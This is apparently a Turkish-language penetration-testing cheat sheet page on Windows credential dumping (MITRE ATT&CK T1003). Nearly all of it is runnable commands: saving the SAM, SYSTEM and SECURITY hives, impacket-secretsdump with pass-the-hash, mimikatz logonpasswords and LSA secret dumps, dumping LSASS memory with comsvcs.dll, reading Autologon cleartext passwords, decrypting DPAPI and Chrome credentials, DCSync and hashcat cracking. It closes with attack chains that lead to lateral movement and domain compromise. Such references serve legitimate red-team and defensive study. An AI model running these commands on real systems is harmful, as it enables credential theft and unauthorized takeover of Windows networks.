Skip to content

Windows Credential Dumping

MITRE ATT&CK · T1003 phase: credential-access

Yerel admin / SYSTEM elde edildikten sonra Windows kimlik mağazaları boşaltılır: SAM (yerel hesap hash’leri), LSA Secrets (servis hesapları, otomatik logon), DPAPI blob’ları ve LSASS belleği. Domain ortamında bunlar yanal hareket ve LSASS / DCSync zincirine bağlanır.

- Local admin veya SYSTEM (çoğu teknik)
- SeBackupPrivilege / SeDebugPrivilege bazı yollarda yeterli
- Hedef: NT hash, cleartext, DPAPI masterkey, ticket

SAM veritabanı yerel kullanıcı NT hash’lerini tutar. SYSTEM + SAM hive’ları birlikte gerekir.

Terminal window
reg save HKLM\SAM C:\Users\Public\SAM
Terminal window
reg save HKLM\SYSTEM C:\Users\Public\SYSTEM
Terminal window
reg save HKLM\SECURITY C:\Users\Public\SECURITY
Terminal window
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Terminal window
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

Uzaktan (admin + share):

Terminal window
impacket-secretsdump domain/admin:Pass@10.10.10.20
Terminal window
impacket-secretsdump -hashes :NTHASH administrator@10.10.10.20
Terminal window
nxc smb 10.10.10.20 -u admin -H NTHASH --sam

secretsdump · remote

embedded tool
Generated command
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.10.10.20

Volume Shadow Copy / esentutl ile offline kopya da alınabilir; özet için reg save yeterli.

HKLM\SECURITY\Policy\Secrets altında servis hesabı parolaları, default logon, DPAPI machine key parçaları bulunur. secretsdump SECURITY hive ile birlikte LSA’yı çözer.

Terminal window
reg save HKLM\SECURITY C:\Users\Public\SECURITY
Terminal window
impacket-secretsdump -security SECURITY -system SYSTEM LOCAL
Terminal window
# mimikatz (SYSTEM)
privilege::debug
sekurlsa::logonpasswords
lsadump::secrets
lsadump::sam
Terminal window
nxc smb 10.10.10.20 -u admin -H NTHASH --lsa

Autologon registry (düşük gürültü, bazen cleartext):

Terminal window
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
Terminal window
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

Tarayıcı parolaları, Credential Manager, RDP kaydı, Wi-Fi profili DPAPI ile korunur. Derin teknikler: DPAPI.

Terminal window
dir /a %APPDATA%\Microsoft\Protect
Terminal window
dir /a %APPDATA%\Microsoft\Credentials
Terminal window
dir /a "%LOCALAPPDATA%\Google\Chrome\User Data\Default"
Terminal window
impacket-dpapi masterkey -file masterkey -sid S-1-5-21-... -password 'UserPass'
Terminal window
impacket-dpapi credential -file credblob -key 0x...

Domain’de DA ile backup key → tüm kullanıcı masterkey’leri:

Terminal window
impacket-dpapi backupkeys -t domain/admin:Pass@DC

Bellekten parola/hash/ticket — ayrı sayfa:

Kısa hatırlatma:

Terminal window
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump 1234 C:\Users\Public\l.dmp full
Terminal window
nxc smb 10.10.10.20 -u admin -H NTHASH -M lsassy

Credential Guard açıksa klasik cleartext/LSASS secret kısıtlanır; SAM/LSA, ticket ve DPAPI yollarına kay.

Terminal window
cmdkey /list
Terminal window
vaultcmd /listcreds:"Windows Credentials" /all
Terminal window
# Domain cached credentials (DCC2) — SYSTEM + SECURITY
# secretsdump çıktısında mscash / DCC2 satırları
Terminal window
hashcat -m 2100 dcc2.hash rockyou.txt

DC’de veya DA ile:

Terminal window
impacket-secretsdump -just-dc domain/admin:Pass@10.10.10.5
  1. Yerel admin/SYSTEM doğrula (whoami / net localgroup administrators).

  2. SAM+SYSTEM (+SECURITY) kaydet veya uzaktan secretsdump.

  3. LSA secrets ve Autologon cleartext tara.

  4. Oturum varsa LSASS; kullanıcı sırları için DPAPI.

  5. Hash’lerle PtH / spray / lateral — Pass-the-Hash.

local admin → reg save SAM/SYSTEM
→ secretsdump LOCAL → local admin hash
→ PtH → başka hostlar
SYSTEM → lsadump::secrets
→ servis hesabı cleartext
→ SQL/backup lateral
HasSession DA + local admin
→ LSASS dump → DA hash/ticket
→ DCSync
User password biliniyor
→ DPAPI masterkey → Chrome passwords
→ vault / RDP creds